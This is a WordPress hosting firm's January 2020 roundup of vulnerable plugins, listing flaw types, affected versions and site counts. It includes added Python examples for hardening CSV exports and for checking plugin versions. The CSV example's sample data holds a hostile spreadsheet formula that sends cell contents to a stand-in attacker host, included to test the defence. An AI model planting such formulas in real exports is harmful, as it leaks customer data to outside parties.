Below is an overview of recently published WordPress vulnerabilities and related news.
In January we saw more than 23 vulnerable plugins, with vulnerabilities affecting more than 1.4 million sites.

If you are using any of the plugins listed, update them to the latest version as soon as possible, and do not forget to use a reCAPTCHA plugin on your forms to prevent spam and bots.

Sites hosted on HOST CURITIBA servers are protected against these security issues; even so, as the developer you must update your add-ons and install reCAPTCHA on your forms. Need a security management plan? We perform the required updates monthly; see our management plans.

DOM Cross-Site Scripting in Chatbot with IBM Watson Plugin

Vulnerability type: DOM-based XSS

Vulnerable version: 0.8.21 and below

Number of sites affected: 2 000+

--------------------------------------

Authenticated Stored Cross-Site Scripting Issue in Contextual Adminbar Color Plugin

Vulnerability type: Authenticated stored cross-site scripting issue

Vulnerable version: 0.3 and below

Number of sites affected: 40+

--------------------------------------

Authenticated Arbitrary Plugin Deactivation in 2J SlideShow Plugin

Vulnerability type: Authenticated arbitrary plugin deactivation

Vulnerable version: 1.3.40 and below

Number of sites affected: 3 000+

--------------------------------------

Broken Authentication Leading To Unauthenticated Stored XSS in Batch-Move Posts Plugin

Vulnerability type: Broken authentication leading to unauthenticated stored XSS

Vulnerable version: 1.5 and below

Number of sites affected: N/A

--------------------------------------

CSRF to XSS in Marketo Forms and Tracking Plugin

Vulnerability type: CSRF to XSS

Vulnerable version: 1.0.2 and below

Number of sites affected: N/A

--------------------------------------

Reflected XSS in Chained Quiz Plugin

Vulnerability type: Reflected XSS

Vulnerable version: 1.1.8.2 and below

Number of sites affected: 1 000+

--------------------------------------

Multiple Vulnerabilities in WP Database Reset Plugin

Vulnerability type: Unauthenticated database reset

Vulnerable version: 3.1 and below

Number of sites affected: 80 000+

Vulnerability type: Privilege escalation

Vulnerable version: 3.1 and below

Number of sites affected: 80 000+

--------------------------------------

Reflected Cross-Site Scripting in LearnDash Plugin

Vulnerability type: Reflected cross-site scripting (XSS) in the search field of the [ld_profile] shortcode

Vulnerable version: below 3.1.2 (fixed in version 3.1.2)

Number of sites affected: N/A

--------------------------------------

Authenticated Stored XSS in Video on Admin Dashboard

Vulnerability type: Authenticated stored XSS

Vulnerable version: below 1.1.4 (fixed in version 1.1.4)

Number of sites affected: 40+

--------------------------------------

Authenticated Stored XSS in Computer Repair Shop Plugin

Vulnerability type: Authenticated stored XSS

Vulnerable version: below 2.0 (fixed in version 2.0)

Number of sites affected: 40+

--------------------------------------

CSV Injection in TablePress Plugin

Vulnerability type: CSV injection

Vulnerable version: 1.10 and below

Number of sites affected: 800 000+

--------------------------------------

CSV Injection in WooCommerce – Store Exporter Plugin

Vulnerability type: CSV injection

Vulnerable version: 2.4 and below

Number of sites affected: 20 000+

--------------------------------------
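The two CSV injection entries above (TablePress and WooCommerce – Store Exporter) share one mechanism: a value a user controls (a table cell, a customer name) is written verbatim into an exported .csv, and a spreadsheet opening that file evaluates any cell starting with =, +, -, @ (or a tab or carriage return) as a formula. The Python below is an added example, not code from either plugin or from WordPress; the order rows are constructed and attacker.example is a placeholder host. It shows the hostile cell surviving an unhardened export, the neutralisation exporters usually apply (a leading apostrophe so the cell is read as text), and an audit pass over a finished file.

```python
"""CSV (formula) injection: unhardened export, neutralised export, audit.

Added example; not code from TablePress, WooCommerce Store Exporter or
WordPress. Sample rows and the attacker.example host are constructed.
"""
import csv
import io

# Leading characters that make Excel/LibreOffice evaluate a cell as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_cell(value):
    """True if a spreadsheet would interpret this cell as a formula."""
    return isinstance(value, str) and value.startswith(FORMULA_TRIGGERS)


def neutralize_cell(value):
    """Prefix formula-looking text with an apostrophe so it is read as literal text.

    Caveat: '-' also matches legitimate negative numbers, so apply this to
    free-text columns and write numeric columns as numbers, not strings.
    """
    if is_formula_cell(value):
        return "'" + value
    return value


def export_csv(rows, harden=True):
    """Serialise rows to CSV text, optionally neutralising hostile cells.

    Quoting alone does not help: a quoted "=1+1" is still a formula once imported.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(c) if harden else c for c in row])
    return buf.getvalue()


def audit_csv(text):
    """Return (row, column) positions of cells a spreadsheet would evaluate."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(text))):
        for c, cell in enumerate(row):
            if is_formula_cell(cell):
                hits.append((r, c))
    return hits


# Constructed order export: the second customer name is a hostile payload that
# sends cell contents to an attacker-controlled host when a staff member clicks it.
SAMPLE_ROWS = [
    ["order_id", "customer", "total"],
    ["1001", "Ana Souza", "49.90"],
    ["1002", '=HYPERLINK("http://attacker.example/?"&A3,"View invoice")', "120.00"],
    ["1003", "-2+3", "10.00"],
]

if __name__ == "__main__":
    print("unhardened hits:", audit_csv(export_csv(SAMPLE_ROWS, harden=False)))
    print("hardened hits:  ", audit_csv(export_csv(SAMPLE_ROWS, harden=True)))
```

Run the audit against any export the plugin produces before it is opened in a spreadsheet; a non-empty result means the exporter is still writing attacker-controlled cells unescaped. The apostrophe prefix is the common fix, but it changes the exported text, so exporters that must round-trip data often prefix a tab instead, or neutralise only the columns that carry user input.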

Authentication Bypass in Backup and Staging by WP Time Capsule

Vulnerability type: Authentication bypass

Vulnerable version: 1.21.16 and below

Number of sites affected: 20 000+

--------------------------------------

Authentication Bypass in InfiniteWP Client Plugin

Vulnerability type: Authentication bypass

Vulnerable version: 1.9.4.5 and below

Number of sites affected: 300 000+

--------------------------------------

Multiple Vulnerabilities Patched in Minimal Coming Soon & Maintenance Mode – Coming Soon Page Plugin

Vulnerability type: CSRF to Stored XSS and Setting Changes

Vulnerable version: 2.15 and below

Number of sites affected: 80 000+

Vulnerability type: Insecure permissions: enable and disable maintenance mode

Vulnerable version: 2.15 and below

Number of sites affected: 80 000+

--------------------------------------

Multiple CSRF & XSS in Ultimate Auction Plugin

Vulnerability type: Multiple CSRF & XSS

Vulnerable version: 4.0.6 and below

Number of sites affected: 3 000+

--------------------------------------

Authenticated Code Injection in ElegantThemes (Divi, Extra, Divi-Builder)

Vulnerability type: Authenticated code injection

Vulnerable version: 4.0.10 and below

Number of sites affected: N/A

--------------------------------------

CSRF to XSS in WooCommerce Conversion Tracking Plugin

Vulnerability type: CSRF to XSS

Vulnerable version: 2.0.5 and below

Number of sites affected: 20 000+

--------------------------------------

Post Submission Spoofing & Stored XSS in Postie Plugin

Vulnerability type: Post submission spoofing & stored XSS

Vulnerable version: 1.9.40 and below

Number of sites affected: 20 000+

--------------------------------------

Unauthorized Authenticated Users Export in Import Users From CSV with Meta

Vulnerability type: Unauthorized user export by authenticated users

Vulnerable version: 1.15

Number of sites affected: 30 000+

--------------------------------------

Unauthenticated Reflected XSS in Ultimate FAQ Plugin

Vulnerability type: Unauthenticated reflected XSS

Vulnerable version: 1.8.30 and below

Number of sites affected: 40 000+

--------------------------------------

Arbitrary API Key update via CSRF in WP Simple Spreadsheet Fetcher For Google Plugin

Vulnerability type: Arbitrary API key update via CSRF

Vulnerable version: 0.3.7 and below

Number of sites affected: about 10

--------------------------------------
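To turn the list above into a check against a real site, compare each installed plugin version with the wording of its entry: "X and below" means an installed version less than or equal to X is affected, "fixed in version X" means anything below X is affected. The Python below is an added example, not part of the original post or of any plugin. The constraints in ADVISORIES are copied from entries on this page, the installed inventory is constructed, and the one bare entry ("1.15" for Import Users From CSV with Meta) is matched exactly because the page names no range.

```python
"""Match installed plugin versions against the advisory wording used above.

Added example, not part of the original post or of any plugin. ADVISORIES
copies a subset of this page's entries verbatim; SAMPLE_INVENTORY is a
constructed site inventory.
"""
import re

ADVISORIES = {
    "2J SlideShow": "1.3.40 and below",
    "WP Database Reset": "3.1 and below",
    "LearnDash": "fixed in version 3.1.2",
    "TablePress": "1.10 and below",
    "InfiniteWP Client": "1.9.4.5 and below",
    "Import Users From CSV with Meta": "1.15",  # page names only this release
}


def parse_version(text):
    """Dotted version -> tuple of ints, so 1.10 > 1.9 and 1.9.4.5 > 1.9.4."""
    return tuple(int(part) for part in re.findall(r"\d+", text))


def is_vulnerable(installed, constraint):
    """Apply one advisory constraint to an installed version string."""
    v = parse_version(installed)
    m = re.fullmatch(r"(\S+) and below", constraint)
    if m:  # affected: installed <= X
        return v <= parse_version(m.group(1))
    m = re.fullmatch(r"fixed in version (\S+)", constraint)
    if m:  # affected: installed < X
        return v < parse_version(m.group(1))
    # Bare version: only that release is named, so match it exactly and leave
    # older releases for manual review rather than guessing a range.
    return v == parse_version(constraint)


def audit(inventory, advisories=ADVISORIES):
    """Names of installed plugins whose version falls in the affected range."""
    return sorted(
        name for name, version in inventory.items()
        if name in advisories and is_vulnerable(version, advisories[name])
    )


# Constructed inventory, as a site's plugin list might report it.
SAMPLE_INVENTORY = {
    "2J SlideShow": "1.3.40",        # last affected release
    "WP Database Reset": "3.2",      # above 3.1: patched
    "LearnDash": "3.1.1",            # below the 3.1.2 fix
    "TablePress": "1.10",
    "InfiniteWP Client": "1.9.4.6",  # above 1.9.4.5: patched
    "Import Users From CSV with Meta": "1.15",
    "Some Unlisted Plugin": "9.9",   # not on the list: ignored
}

if __name__ == "__main__":
    for name in audit(SAMPLE_INVENTORY):
        print(f"UPDATE NEEDED: {name} {SAMPLE_INVENTORY[name]} ({ADVISORIES[name]})")
```

The numeric-tuple comparison is what makes 1.10 sort after 1.9, which a plain string comparison gets wrong. Pre-release suffixes such as "1.0.2-beta" are reduced to their digits and so compare equal to the release they precede; treat those as affected when in doubt.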



Tuesday, January 21, 2020
